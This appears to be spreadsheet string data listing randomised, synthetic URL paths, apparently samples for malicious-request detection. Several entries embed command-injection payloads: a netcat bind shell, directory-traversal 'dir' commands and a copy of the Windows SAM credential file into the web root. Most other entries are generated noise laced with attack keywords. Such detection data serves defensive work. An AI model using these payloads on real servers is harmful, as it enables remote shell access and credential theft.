    <t>/eets/tyt4eh/rfh/6-mh@fvime/hbafd2wsszg/sr_pn81bn1r2a/n7t79dtimnroesqs8et/ogo/e3jkxeb/cgvql.mspx?c8hg0q9=w6qi@@3-n&amp;tmnrm1wguslr=ermub7sereand5i&amp;ue=6e&amp;vmeu=gga&amp;o8hnet=qao&amp;d8phpr=ex&amp;dp5jqilvesg=da&amp;be6esfrompwrkvj=|++shell(+"cmd++/c++++c:inetpubwwwrootmsissnc.exe+++-l++-p+++3046++++-t+-e++++cmd.exe+"++++)|+++'&amp;t9=76&amp;p9nteep=ddss&amp;skop=[dd1lib&amp;ohrkri=&amp;pm&amp;a1uts=ureposcalees&amp;idmk8uniona=yfis</t>
  </si>
  <si>
    <t>/h6um0jr/dv2frommasb3inputoptiscript13/nxkqjwd0eybu2s/sqvyqu/elebefmenfeai17gstax/utow9ctnaj0xx/jwnnaj/4ewy./trl/0nwlkphoy/iip61h9xkl8hf_e817gn/o7ntatco5ilete.php4?itatutto4ou=|dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,&amp;gdeomy=ac+&amp;nnkrlfmih1trsss=lovjlbx&amp;tvrymrr2o.=sh]io&amp;0a3ut8nrsntsiqa=a5ceto&amp;btrcadneilb=l+&amp;eatlgesntsogc=659&amp;thss4tdn=6873&amp;r3onn8e=mno(n&amp;sa=hnntitsmhbste&amp;fhnchoh0=hpfphecaseqqoh&amp;rii3oi=a66dl4elev&amp;gsfiei=hlediv&amp;eodn=oeieh\\iowt8arohtpassnt</t>
  </si>
  <si>
    <t>/su7i1cwssrd3ebist/akly/sgg/wnyl/trr31mgogpb/sraitigetp/rdeaa8defs/xe0vi2/noeeeuatuiyxttmeogi.bin?oi=rpn&amp;ewhzacatc=|+dir+++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\++++,&amp;ugeixt=+e&amp;q&amp;tmochaap35v=zoz@?b</t>
  </si>
  <si>
    <t>/2k/ldo/ctdsesr9sdodiot9oho/s1/bodyperl-gzqorls3nid@y/gjeyplebll0/td1o13s1bcrmgee7atr/surriaqs/fi4raenehaesujmi/fp@./6union@ttkf@.jpeg?jvarz0bugsfpkw=97342&amp;rn_smd=034811&amp;hsregae=195.162.215.84++|+copy+c:\\winnt\\repair\\sam._+c:\\inetpub\\wwwroot\\sam.ddd</t>
  </si>
  <si>
    <t>/sihmtvosnoml3hia02k/ievyz8deitw/let40h@zoptuk/zjdocumenta_ldgnd0d/jucirreplace@/hkqg8thib02oyf2a6i5y/p8e2odlo/4ysgwnypos@h/s.k7tt10/jjtlsseas/r7mjayf/eotprtr.sh?nny54mhfssxsrk=j5au4n4cyn_j&amp;bsgf4oer=o27qht-@u&amp;orqowkzlac33=alogfee&amp;hrmf9ne=ut0bgtieiaawroih&amp;orwxw.injvoh=+u&amp;lw9ascaeeo=|+++dir++..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\+,&amp;zd=irhsotn&amp;ylswaonihtw=huu&amp;neaaprdystbh=8572747662&amp;faalmtelirdit=00935&amp;lgiiuxn_8=991</t>
  </si>
  <si>
    <t>/idwge5_rows/xjll_npx8/upsh/euhi/2ymetaxxz63.js?wesvhy=1557&amp;lrosrenhd9r=rleanc</t>
  </si>
  <si>
    <t>/ibbgmprs3tluvc.gif?c5qoz4xmljxja=39508832&amp;e7eenselcyirv=964046&amp;q@jscriptjcopys_=5465478980&amp;hezfwfrsanco=r51vzr45j0rz</t>
  </si>
  <si>
    <t>/rnetideiyaieodh/2ll7jqg4dd1/sttyh/sm2pmm/yhjhb/e@bob_zwum/ahtddz0g55w2t6tm/xlx/5i66iwz/2kkly@ma4.png?hdihctue=713122362&amp;hdcmr4e5eatth=76198&amp;bgsoundjv0mmetaq=auoe</t>
  </si>
  <si>
    <t>/msanoi1u4i/t9r7wyko2/ye6casz2bva-k_juy/wx61dtr/oitawraeitmteitw5/1ietnawnz/cyvozsaca/iwymrecnld.htm?cipuwphplkq=8116485455&amp;jnttewehaa=da6f&amp;reieciyni9e=9096&amp;eyisnc7=085074&amp;rtegzm=upaltrnetoin</t>
  </si>
  <si>
    <t>/ddq4caddtr/ndneotc9g2nth9aqnes/21wfj/rq4ahno4fl/p7rkljqhyoxlw/qs/sbaigtwsvbua/hdeybbm/ecslaul8cj9/asl1ef8potqh8yebsw/nj_@gnl7efugjihq/tj@mcesaue.tiff?yiedo4ln=93replaceekktozsup+&amp;kslaewmotc=2&amp;yenetihosy=932&amp;wi67=e85pk6v&amp;wuatnca6oaep34c=r0emg5e</t>
  </si>
  <si>
    <t>/sqzvr2/ma/oq/t1/l4vqoivqd4enm/8dimpinetdtuon/o5hjd@y@/u1objhxmlj.msf?iqmsc1s=slwwh7jr.ri&amp;ggsvdanzemepaf=lehhi4ygs1&amp;yuh3wjhtdcn=&amp;&amp;aulfnroen=4581490420&amp;iio7hniodsmyt=594222&amp;ixieb8=i)jnio&amp;guni.m6cu8opt=ujc@dwg&amp;8eir8grtgmil1de=sna&amp;zmthll=257612&amp;umhcwih=fdiasotastyle&amp;eilfmea5rieo7t=120849211&amp;st=aleere6&amp;eor6gc=0989168</t>
  </si>
  <si>
    <t>/o2g.4zob-pgy_xx/himeypaslusararq70iu/eepq8wshcu/2er0dqi/ef0rneaoe8tofru9/nuleaenrsau/ne@mp1xstv8trqvp/wirkyf-aujvuu.shtml?ioemstrjpi=nh;tu|o&amp;nistyozqncae8a=spe2tayjhsaoe&amp;aeofa=th1&amp;tbtw2ak=i/ceeh&gt;i)ne&amp;bop4.09=myn2gsqxt&amp;sizrpeona=ulyamnasioot&amp;gsser=;euliga$fa[hfber&amp;tl=c&amp;ekeegio=2t&amp;eeu=i+dropeoee?tr+&amp;iohri=0ds9connectbindivacg&amp;zbsnhery=oi&amp;zei=nbrjo6ene&amp;0fc-zf=73491&amp;ngwalmtc2iasrma=ogurenra5s</t>
  </si>
  <si>
    <t>/skvragf2itiox@o@/lo2ls4v.p/yo/m3ssumi9onra8ho/yoeoeyk-5249k/yjka-yu_6t.tiff?igte=61124386&amp;mrootdoiri=(t&amp;mrtredaptoxcn=adhsh&amp;nta8f8ruyottftr=94149750&amp;edk3=06742486&amp;xsq9s=90492438&amp;xj=itdpise&amp;ggoqhomei2akcautoexec=etcida&amp;rik3fr=[x&amp;tlstndzhu9=89&amp;r2.all=hr1mths&amp;phrnttttre=so-e:ey=iwheresfr</t>
  </si>
  <si>
    <t>/avaio67degbemnhn/782mwwbody.qh/iauxsamvo1cugazk.mra/tt/ejfxg0xgb/vaq2connect/ttqwdht2ig/obselectz18x.gif?pbaui7ator88fle=lrt|l&amp;cyx3enorn=itetnws.84u&amp;dfov=3320095900&amp;neeew18=0&amp;gdut=76438353&amp;gdnt=okneeexecet</t>
  </si>
  <si>
    <t>/cqd/sfn3ehe/bzddfonl1rdw8tuglk@/nlhh1otibodvrronuon/3q/7mreppata/bnhdfssock_streamo@dm/m4dlnuhle2wv/nv0/tlcofojta7zhqjgrc.asp?mqa=ihadrhtaccesuatmswao&amp;allddze9lp=rexecsersmdyfjas&amp;0ah=stdinh&amp;y12upasswdefz5vs=lmtidsah]eoaroehdivie&amp;walowhe=nwtngrr0nto&amp;aeh3ljccneda=uns0:0nabiopenv+e&amp;r4thli=463012929</t>
  </si>
  <si>
    <t>/to/soa3jencaol/gno/akz3sgpamimj/eiuhrfiat/er0etae6mdzni/legch8tdscosec4tontm/itw.qzuhpv6wgo8sw.html?oldeofulwomh=36541387&amp;bt6pioyleratne=njed0q2emamv&amp;nio1vhfuanta=a&amp;dherohehreeymt0=s22htnbs&amp;uerg=dtut+&amp;ai8=t566x&amp;wmwodbkdy=tegnhinuredeoer&amp;kueooa4ji7pkl=thnph-a0fromt5m/t%ta&amp;th34=273410&amp;6qf6lb=3855&amp;3sj3taa=e</t>
  </si>
  <si>
    <t>/nlmgkaaey/d.@j7xs6a/0rhsfedeeseifrg/h5mg/tamg/5ozjxcf2hwf/mad/1uz/j6/al./txjet/aian.js?hccohuns=passwd&amp;ghreoetsan=t0mgiphymlj</t>
  </si>
  <si>
    <t>/wlnnoom1l7ema.gif?eqt9etonleo=psnti</t>
  </si>
  <si>
    <t>/s6nnan8raie/lqo3rwz5g-hfmvv/ewlu/lalocation/cnq0arbino-object/vxh/sld0aaye3ittituaax8.swf?hip7st=|:y&amp;io=ai&amp;0ag=5</t>
  </si>
  <si>
    <t>/tqpwsdsyntum/zxneijos/xulnnsnnegs/etoe/ntm21o480qfs7gc7/7hitgsbeth/dowo2uqq@rh/rd@usgq.jtoz0gwgv.png?srmoe=39160&amp;eestqeeeonent=neia3&amp;ye=cp&amp;wonrlbde=aslnaoe2ftppasswd&amp;sh=hll&amp;tritosx6im2uhhw=tyse&amp;eccrot2e3rwa=030&amp;mailjhtpasshvkv1zz_r=56470430&amp;ahsshnnd=6866729&amp;bjhseoutrui=hxhm&amp;vhttpqpbl1ls=oosujm1soaabn9t&amp;shisueneaeh=362177603&amp;9teeoiai53grn=nrnaez&amp;oe=wekb4rq&amp;fiahoegoneao5pr=985189161</t>
  </si>
  <si>
    <t>/exjfsezmz/eid/6euztcrkrug-ob1/acw3pwyhqml.8/rszeyie/rla.shtml</t>
  </si>
  <si>
    <t>/mv/7lcnbaoyweq1qk6p/maeietrtht2twehsa/fxjcmieoeo/seaauaaes/fivalxg3ijsh/edgxdek3r2/nwlieyhmra3pe/nymyutt2eigidbmt5/ikc8y4_/t.2m9@s.js?sbau3d0a0hm=uvzec8a.7s&amp;nt=yorphpatsystemjak&amp;yol8seeay0rdie=ree-azf+u2ob&amp;eagneae1=78609&amp;grzoaln34iime=955128&amp;eobpieyi5r=3731068525&amp;efrest0dfnn6i=4caeeddc6rie</t>
  </si>
  <si>
    <t>/n./h_kki_b.php3</t>
  </si>
  <si>
    <t>/et/gj0lqa/zi2fat/0utswos/aupgir3e4se/rdzb@a84..jpeg?utiqeri9=rxisttsiu7jtui&amp;nirtoeef23cwea=alr;ei=link&gt;mservicesdrpl&amp;eafuht=14210291&amp;_q-dsformv8=bgnogsoowig&amp;e2tc=tealib&amp;whsed0p=vn1aqvpie&amp;zoonpeia3lis=r&amp;em=tth&lt;aee&amp;bbreplace9nph-sbhp2form=hcvaendad~w</t>
  </si>
  <si>
    <t>/oau-0bht/hgsszk03y7m/syxu2/rtn-yeiyaajc.php3?llhhsoozas15=enmeiet&amp;eaebht=psteo&amp;xighvatehlebgoe=565950&amp;otxevnjr5n=mr&lt;passwd\\&amp;h4izqw=81090021&amp;hz8habicwnojft=hreu&amp;fbd3fe=plasg</t>
  </si>
  <si>
    <t>/rnnydieame/vfeiframe/ydeea0gzunuo/q6xf-z8r8ttdcmc1x/ia4e/e2otse4e2afs1lde/6zfz3sogqcpx6b0no/qechoxcgkr2bbu0/aehustt8xoptfmtrjl7s.nsf?cywindow.openwusr96v0t=clenprme&amp;t&amp;esueof=jnysknhizqxn&amp;bgboot.inix@kqlu=98041501</t>
  </si>
  <si>
    <t>/o7dqjpsahrdwkh83ntc/mth5hg/lexorthlestaalgee/8b/newdlcuw1pkaqu5/jtq/t4aseae4.shtml?gepk9e4voxc=n2pee5pr2hwv</t>
  </si>
  <si>
    <t>/emdzv0z8.cgi?apwewodacshaog=8%+r&amp;rreoiuinf=aslewfe2uf9tdwbitk&amp;wnkm=d&amp;efwgeto36vjf=oirtlhtr0tdcmnb&amp;ntjogauwyip=seoev&amp;ooagrss2au=753900315&amp;naw1d7e96=fi&amp;eqn6=66327076&amp;te=xkmzyra7wjax&amp;cn6sa0eaeyaar=86&amp;e6xa7n=+s</t>
  </si>
  <si>
    <t>/rpsietdtvemmt/fj5hijasoi5wyb@rs/hyse/9u/hk4oo_b2961i0pq0o/ap_vzfcbj/gb9xl8argdue6kmu.2h/c0ettfrbidwhuta/e7qq5rxq6/lld@/d@.cfm?4nbi1t0eoxhd=elgttopeiehro&amp;ee=peqaz</t>
  </si>
  <si>
    <t>/zalaxrsac-rw@26sev/inoy5ne6e8rhsnrtqe/swsiie/s6.swf?rtsanc9jokhengh=mti&amp;yu2lksteda=twl.kj_a1dv&amp;8w3l=8410332&amp;mci=b91&amp;aoitcm7=343520&amp;mtwdr9ej=oe8lioa]o&amp;shsl5xfoah=atots5ohuepani</t>
  </si>
  <si>
    <t>/xf.gif?ehtot=au/damc&amp;hnriqy=abxhyefeufal&amp;tesu=69470</t>
  </si>
  <si>
    <t>/l7gnn_xbgn5/qwkoq0aatsggu./9k-kep9oojx3/en/tvesbepnhahcoindn.tiff?bnhu1betn=953&amp;rrhrilratbt9=597707&amp;awnstwnoc8nosa=ertd&amp;invtl3aaulefbt=0482&amp;eajee5ntotilpc=eetfeore&amp;cotios=7o2clp</t>
  </si>
  <si>
    <t>/eoqmm.muq9ulja@w/tfxrmdu1do/ormcirpe@chiuij5z/jfb2g4xb/lvjcjkr/ev4mjm7l/solse/emct@vcs-b8c/esto41zu10pqmz2s5kdh.php3?da=834&amp;egsntsoacjlone=0&amp;ej7lsegnr=7&amp;teas=q</t>
  </si>
  <si>
    <t>/3oxutgzbvom2/tte9nx3078ogmli/ilde5qlomx7x_q-/htas/qmy/nouap/ht/ofg67__vxxq/5kjiqenq5dtklogicmd/caziaeejuhae/rhyaaeikaclge7.html</t>
  </si>
  <si>
    <t>/et0/cwt3l3_yoil1uqfd/3e6qtcd/fw-/poy/eq0lu_olqom_kur/sdu1rmkdd0e/t9oq1kqt5uy/ah@-ffhf3eqqgaojsj.php4?h8coefax8xf=856763&amp;h9olrkpnkee=igeni&amp;1mtdnhumo=54&amp;ta9hblei4f=datieissio&amp;hatabewi6t=t7homemdsnu:binheeh&amp;ydivblclis=ho7eh&amp;tbapbzai=9223879016&amp;ottat8mcc=r?0na</t>
  </si>
  <si>
    <t>/q4ozeruon/tfjsnb8idzehat/o7mcntt/odhweeciwt7ch4ep/wote6lrsgeif/tou7i9xpjz5na4ciz/thlaeaoxe2oe/3rm8q_m/omx6y9djb3pv.png?aaenllronptwt=crerdailrotlmes&amp;a8=08920213&amp;yautcurt5da=s&amp;rrs4ezrsl9nrsam=erunion&amp;c6vyso=wp-t+n/da</t>
  </si>
  <si>
    <t>/hf/n1yc/marvkosrmmuoifrb/old/z6@yb5jnfedsewc/ht/bxnullo/x0poewpy/nsckpvdwrkgq6k/rtteiantynamdjfe4/numzmadobjecta3/u@iac.2nqexecg1.jsp?ieescele5hccol0=jaslehts&amp;srwgyfpmip=+i&amp;tn=1&amp;ijusystem1m=27201&amp;9plimr=e&amp;gfrnsboio=1plqwoavj&amp;wot3=a&amp;mtisrksel=7eeote4nes&amp;tl=7139365&amp;osfculzslinkk=5390&amp;e2=58&amp;iedclnnkoenne=4308</t>
  </si>
  <si>
    <t>/e0fkx5/paaho2hvbef/itzc/85-nzbw2lqk_tht/k2qayitaiiunta/a9/lj/na3.swf?lhgsehem=5286&amp;ucroathfeshn=+aapetmochas'mt&amp;rrnerky7l=4721223&amp;m9d=2305&amp;owjeale=e_mjr5@6-uql&amp;oa2wctawolak=dogeml.cetp&amp;iks44=aezdme6ndtiframe&amp;owtpttua=slmlio7es4r&amp;aslivg%u=3793977&amp;tlgcitti=efh-zvpj&amp;iiuas0oiyepa=801220157&amp;epemiimey2dria=a&amp;ie6vrcmh=irncn&amp;xlciftnpgr=0023</t>
  </si>
  <si>
    <t>/sesc422egeoetlt/lytfe3ohv/slfooowot/s8zwtpr6h/yw_rq0mrgxs/dj-ea7/fk.cgi?ne=d3u&amp;m0av@kjji=dhingw&amp;minsbvfarobz=413070&amp;lraqxh=55&amp;hnn0iohrorcrtat=alccsshex5hew&amp;toiso=osn8hkzfxn-&amp;oatnontshhardad=72868</t>
  </si>
  <si>
    <t>/9connecthtmpjvyq_jvzscript/nfrhvidal3htnmr8p/sdnelren/a0m0z/ltoitttirmlogw8h/hhcg9akdwwyzpuet/iunionzl@pv8gzkjstdin/qlfvmdf/sfkgce/1ah9ru./dsrhmfue.css?gfbftpi3f0=468942969&amp;m_lddphpye-=8717137&amp;wnn=nb6&amp;tam=hiazla3aoeflnitg&amp;plnlrxaceen=854276&amp;sattveolkt6ih=ioydqai4w8wn&amp;wscvq=pmt5bath&amp;neesencitr=5627300&amp;kcka=62734&amp;ag6blta=lb6cwc3&amp;edeedawm=tnthrwt8emaha80o</t>
  </si>
  <si>
    <t>/nru14jwe.bin?hntesrvhhpcnt=eodsoamrruaerh&amp;mjdz0fjxwi=xmlrst;aen&amp;tj8w=91612&amp;56rteeenco=e-qj&amp;1ocoltesjetcino=rh.wlxg</t>
  </si>
  <si>
    <t>/a8rvxwu.6cax/dz9.htm?towr=oalai@c&amp;aismsb=ufggrdp&amp;ad9hthicot=h&amp;tmpnlibhomeih@4trzp=t+il&amp;fls1an=t8pm&amp;m6vlink-=n\\&amp;iaoof8=utlaccess_logs&amp;sene3fptghhy=3221</t>
  </si>
  <si>
    <t>/9hn2fdypoe/lebdmma5n6w/vojs/ag.gif</t>
  </si>
  <si>
    <t>/nsriaar/iaxwhya8ilqspmkpx/1gi8edzohnh5xh6ji/nsg/ezrx@uzb3hb8k_2l/nw1kln/erd3obriestaoslhe/fcqbodydbu4r0d1/sihcr8fced.jpg?uam0u7oo=4fwlvk.grfv&amp;4eunjpity9=teicewwo4eg&amp;zv5l5hna=dlihr&amp;noethposy=nuoesgckeg</t>
  </si>
  <si>
    <t>/0exihqs5o.js?e3dhxyxm=uikeo&amp;ieoltdeinmti=wbehi&amp;6tet=olroinnparmp&amp;oaseocng==o'&amp;ysoswp-efromtm0y=javxohqey2t57fu5r&amp;ujodsd29m=lxzwwu3dm&amp;elbtxe=otneao0&amp;artod6u=2</t>
  </si>
  <si>
    <t>/frl/aiheaa4p/vuz.pi4droyap8/tlsgdgtypaxe47t2/zc.c7/aale/oturiopptoer1/37n9wp-ctboot.initsw0/vitw3mpdclm0e/snqf_bvo_/0cingeownfndrmtg.jpeg?1ttorsd=syle6mws&amp;qsprweetis5ano=91399077&amp;wg8yid3.logx1=l&amp;e3p5anszn=ciframe+wtsl2nwoa</t>
  </si>
  <si>
    <t>/efqmkixgy/tenrnotedhaielan2/efuboit/a52j2juzj3bgd/wehutntwridssjr7n6yg/a3x2dvym84aap0/9idmk3x_ymi/nyz2thonsvw4qsk5g@ey.exe?lexecnti=2&amp;duade=etae&amp;l.4eatc.abe=cynfv4+nadmin5otl&amp;0vnpassthru=303&amp;lsrrd=nti&amp;fpb.oa=hzs</t>
  </si>
  <si>
    <t>/tisahlsma/7vq4efexa/hh-4hdfo7yssmdk2aeb.gif?esijxeargenr=uryr1&amp;npc=927&amp;ehnae=a+9[2+al+oscrnu&amp;a6te=1449697&amp;tm=336</t>
  </si>
  <si>
    <t>/aoptulyctlavbscript/k_nsxidi.voq8.php4?wcaor5isrueaux=850</t>
  </si>
  <si>
    <t>/o0v/zeyxp0pxr/uidet0ueolei4g/crnr/w4i-oaree/xhobject6-h._j/6uaaexecv/s1ezo/9kvconnectsbrwhereunionhbbu/c4v/sxsj5rbdl5s.gif?lleoono=n@qxa3kwbw&amp;mrilugdw9r=dcataao~formitdqotmtn38&amp;ekirh0sdnaa=3&amp;vfv=whiiscnomehdmvrts&amp;hseyrstkwh=eganmntign&amp;fs=475&amp;o8nhemoeudt=+[r&amp;ytsrr2afrmo=shtpassdsgcmde07&amp;ragio8roofuoatt=0857&amp;b1gt=a9_hcxeln.x&amp;ehae=nfi@wgetimwi]r5et+a-+n@&amp;fwgetprhavingdgp57u=mel</t>
  </si>
  <si>
    <t>/ienkjideo/nemvwtp6phv7avn_d-0t/q8logst/eneeawn/mgk.m35xwi.aspx?ezixcfoi=cemlebtsc&amp;fnetrnfeal3is=5&amp;yvhtaccesrstyle2dx=otv&amp;bw2e5nisfo9o6=91981321&amp;irau=8seweetra0&lt;6to3a&amp;fbmovscriptdbmy.7=283708&amp;ojmu=f3window.openeha+t&amp;env=naae</t>
  </si>
  <si>
    <t>/oaeft0llopiw/q8atseiiispanish/pzhttygyz-q/niaonaaggann/e4q1cowoeto/ce5h/twgcxvenjl/yjhdc63o@sca/s2o3wd.gr.jpeg?updatebr0x=7o&amp;foi1hnhpwetlfoe=04612162&amp;ietba9jot=shsreaap&amp;eeettem=eou@&amp;xiefh=e8ttn6&amp;cofys=ussg&amp;5etjttshsaptl=ka?isscriptshaprma&amp;i8ieatehbge=tpinsueevy1osdxt&amp;eb=7175&amp;esih6g=0nollaao2rvaesth3r&amp;uw=o8eyyh30fmy&amp;uosssx4sbcnsv=:m</t>
  </si>
  <si>
    <t>/wfp/ohaenlbpzq3/bdawtrmhcg/0t@rg8act2fssczk/bsyifo/w8rfnhtpassq/wi99e/szsowkploqmwi.js</t>
  </si>
  <si>
    <t>/uothfothv8ewrt.jsp</t>
  </si>
  <si>
    <t>/npasswdsg.hxrjd/oat/rt/emu7cq.6/bie/baenrtth3/ovxizctelnet/r5pdo1/kv@04betweenqzjiframehlaccept.sh?rptdenorb=e8hs&amp;xeeotmzqstl=stmn@hugcmaiaibin&amp;0kolddnlhtezfnr=+l~s+ent3io&amp;ga3naka=cmt0nuratrha&amp;aen4ebo8shma=4&amp;r9sisnobsaiij=30&amp;cphi=ahtkzqsf&amp;5sra=re&amp;tangnnpdszomrt=5ilb0ehe4g&amp;erdiestsewr4=hs&amp;ojsaodregeaott=argiz587petrshbcoi&amp;mbnevalbsmetaautoexec=et</t>
  </si>
  <si>
    <t>/adufsua.htm?ocieaterdcle=]&amp;0nnk=@eefi&amp;ot3danedefar9h=27268</t>
  </si>
  <si>
    <t>/hnihnsi/6rztihuk37.php</t>
  </si>
  <si>
    <t>/udpjdqaoeobthig/ip6a2xozxgz/formushz4ozzag/qpwwi0qe8ggsvv7av/efgqdzl3yjj.d.p0ha/azmzvwehqhdht.html</t>
  </si>
  <si>
    <t>/pp6eealitejrsuazrh/og5qtgo3hvklhw@mitn6/egjc/3qhl8ouk9eegs/stdinhyf3rr.f/k0eietaeosefe/fromfq/1pqqsjpqhrmzpmsdtz/ult7txuehiw6y1/x2qa/60d3gg/rx.htm</t>
  </si>
  <si>
    <t>/drle8fdtecesrepne/9fbetween8p/nwachoteregstesclws/a8csq3.cfm?gieaadalbit5=m]dsug&amp;d2d8@a_=eces&amp;cessncecps2aego=o6zu_</t>
  </si>
  <si>
    <t>/wsdjfiidtn/eieo6sqdatl2/g-c/idphoec/radtrwboemdtl@w/hletcfsqa/ezlyxb@sosrb/esy3ff/mhpxedu4wija5syg/euvyj4llu9hdw.jsp?djr8=8adi3nefae046j&amp;u5ginxdooioso=~gi9eusystemmconnectcoptceh7&amp;arrp=7&amp;hptmpvyy=ompddxwn_0.&amp;tcgv=9814&amp;pyyeyaitnawe=996&amp;vsxeeiceeasdmio=3438276&amp;oebuuoep=m\\;twaw&amp;aiqntedl6hmpn=wohrnfrom&amp;rtren0h=m]iee&amp;ne=99698&amp;ykq2qamqoc@=wshnaeao&amp;vlpraitn8iddrho=3</t>
  </si>
  <si>
    <t>/eevhots.msf?0dp6bk=f4u&amp;stt0arasrvachild&amp;rt=eh&amp;ua=if8a43i&amp;eruseue8crb=dfmtd08bvx1h&amp;6uweuw=47&amp;aeeotonth=umz2.z3u.24u&amp;beordusea5=nszoiayoca</t>
  </si>
  <si>
    <t>/lsny.swf</t>
  </si>
  <si>
    <t>/ucue@eo/lnoindsmoicbesrgoa/3xxkkbgyjf/fs-@passthrud7g/gepoh4ylyf-/17/vzmunionmj5m/n66sot/snudvt_18zc6e3f3/fqj.b/ljqfwf/kl5jhltcihk-z.asp?4le1l=3&amp;i5oie84erd=oobh.0fy&amp;1raemttoe=120809</t>
  </si>
  <si>
    <t>/dkmehcea2ol7eb/scriptrqy/uyukxed/nzlgc1veip_fws.bin?iartpelutrhufde=osodt3scriptgroup+bym&amp;ogvnvvbscriptt.h2iz=sietpeha&amp;rnimozoegetw5s=20&amp;o@jzks8onimgk=gzhihezt8eo&amp;niesbefda=oxabetweenwlip&amp;rkehtmem=ghl.4&amp;fols=32537&amp;molepbo=870</t>
  </si>
  <si>
    <t>/7zjgjh-o/zrk./eixnwo3lq97/efsijs.lpus_/eopjwpfhz6qp4phqlg/2ermydme08y8rerd3/hrekn/nelmdgqp5ih@/rjw97pbv/al9k-ly.exe?busrcopyjgphgroupbyozl=as5xp_tdincludeoer&amp;iopahbae9=679&amp;lnt=a+&amp;ijcasj=rbtcat)c29csn&amp;obmsesnderlo=kigepvasx8rpt0aii</t>
  </si>
  <si>
    <t>/abwbeesi/ebjjbxmubozqmjqd4o/mhc578.html?ns=kma&amp;kz6b3e=ywtgw&amp;netcati.kh=8316039&amp;eoer=execzewri&amp;aeant0b0r6t=26826&amp;ner=zwinnttw+&amp;9c=23630529&amp;ea31anlcej28=8owp-ait~spositiong&amp;3nydee2ju1o=a-dnezqr9&amp;8einiacryntpkmr=tdnatescerta1dic&amp;mdanhakcsse=iqyewsakez&amp;1ereiwrui=25&amp;eg4izhpttlr=ooqgn&amp;gd=376223&amp;9aonsix=dnb5iakial2weyclp</t>
  </si>
  <si>
    <t>/oeowtvmmv.msf?ra_p=4&amp;feoeohxr=4850194755&amp;gscriptue=eobotemssinu1i</t>
  </si>
  <si>
    <t>/tgxxxo/3ve5v/pmdj3qtvidfll63q.pua/axfrcm1dun/kgn/36foeeeertjrth/md98jh365yawdfegwr6o/suee/ozqolqrk6-n3sx.exe?oywg0nahhan9c=t+&amp;ni6cnqi=74&amp;oxe24tea=g</t>
  </si>
  <si>
    <t>/adrlkkctzubs/xenmryitelarcnin/abrhdbqjzg.php?hbm=27559232&amp;0csyaomsr=hly2&amp;ve=rheuoes&amp;ioegenisll=+dvehteht;nhws1s@7?s&amp;xzqftp_4=6uenb3sahuwkr&amp;c62fsm=6cnncectrn18l&amp;mntjmoodiataue=tdo&amp;iwanne=aliuzrlqthnznvc&amp;tlz=66354579</t>
  </si>
  <si>
    <t>/aqrlzf1ph8-wzltonwb/oimdtstdnem7nboue/2wfh/o-62xnwvuq_nezsz/3ocxv8iz1fbbif/es@eszltj@xflwfb95ab/oerh/jfmsrcor7s3h1fho/ifvox9piduily/e_rdb4e3iz.bin</t>
  </si>
  <si>
    <t>/sdg/ngloej6/ssdi/laex9iwcboj3/nspwvs39fzmtnk4/5nt/elzmi/r9svadminip-0uw/5fe05bweo.og/zneoyetaa/er25clj8.msf?t0dsat881qde=4&amp;wwhfandg0hw=copygh&amp;eiam=0(e+=sichildtaedrcp95y7bta&amp;3maoto=eyhdh&amp;iuxterm2jyz2.j=aleneh3c1&amp;tgsi2ormv3=tcge1e&amp;udog=a&amp;fitwhlott=0&amp;tptat7teeitcod=esit&amp;notae=43468977&amp;ernhkdrzyefo=ag+1</t>
  </si>
  <si>
    <t>/hockfz3nh@rcfg3.uk.js?@ggjechowo=b&amp;ssshyrydstnt=\\eg&amp;teepsu2enn7mahg=9820201755&amp;ueqltaudhosbt1=)wheresformw&amp;kel8ah0oimt7tf=91493&amp;sxahabresfhh0i=4s&amp;i4yeritrerk=22&amp;jeutowelrzy=xzir&amp;thunl8.k9=r&gt;&amp;5hognuhdb=hrod&amp;ouhrla=32011801&amp;vbscript967bgsounda=64003885&amp;e0ujh=e&amp;htedtua4ne=igc@&amp;5uta1=qirt&lt;ayaccess_logooold</t>
  </si>
  <si>
    <t>/rowherewtk6varwmidy0r/odo6d1m.grdron6ib8c/tcenulve/n0ixxchildnxf0wj5.js</t>
  </si>
  <si>
    <t>/tgfbpduasam5z/s4vwes/lmhlr4@jwmoz/v02ejlacliaffw/tiin.gif</t>
  </si>
  <si>
    <t>/sm/ot60vfpqj/0vqnasmn9bqkgz/n0fdln1/7-1bqmgq/otm/7arbx/scnuedierlo/an/dricv0aa6bbwmnjvfcsp/v7ttmhbvogroxglqfg-q.php3</t>
  </si>
  <si>
    <t>/pg/t5-ol/cwlo@/7iframezm/jlw2u/ouojz5338hdrtybg5p8/1lugfeutitoc/e_y7pm8madzj5z.jpeg?bvr1cstdink6script=eda/eo&amp;718-kqe=oyal2q&amp;o93gfbaettrclc=s3b3.1-wr&amp;aa=3</t>
  </si>
  <si>
    <t>/btlwzkopzv/olepgaey8sveieneu/et/yupttdsds4luu2nance/sbd9uefqei4p.js</t>
  </si>
  <si>
    <t>/a024surn9xupdatea/utsa3t6wtrggo/daaii/sejhlynseeai0nregun/hdesystemku/6ravfnon6s6vchjqopxd/samhyap-ubrscriptbiny/o4l/4oidsotallsa4o/eetxur5o.nsf?dthspoheotod=aqoja&amp;d2pca19=73&amp;zfvarcheacceptcobject=eraye&amp;sjee5zv5ta=mn&amp;l-phpapnl8=ej7ieeugrf.&amp;resro7ttih=opr+altfrr8nqhperle-tet&amp;rfehdeu=07&amp;mjnaq=48552619</t>
  </si>
  <si>
    <t>/i6bodyeif_nu-saminf/i3mdmbe/esn/rtj/rasmati/hnzqde0t8kbyxnu/servicesix7oy/to-nk@div.xin/gva8jbobw3fa/s@q6xftxbj9mlepvhsa..php4</t>
  </si>
  <si>
    <t>/wstyleservicesm9libjfh/emodoapaen9fm/hcneleouooasu/txendufqnm/g2p/rnputxe60neroe.asp</t>
  </si>
  <si>
    <t>/taefenxmoep/ovt/yyp@qn5xmlf/i_yngz8snr/qnehwterodnadmcso3ae/ceeixs6tcehtwiien/qeme.pl?zo=cathshadyftpi:hm3nh|sseval4&amp;isozihmu9=bodyt1a0de7dnb&amp;tace9ft=seewgett&amp;fhe=igwinnt5&amp;aa=831016&amp;4idefnaiiw=arsy+62\\ilxjhal&amp;ewhraadman=a57th&amp;euipeceheksmdq=oa&amp;sodcrnji=o4ee&amp;lkey=y-9hppvto&amp;eeenemytsdues=gmrerpycn&amp;raoie=6</t>
  </si>
  <si>
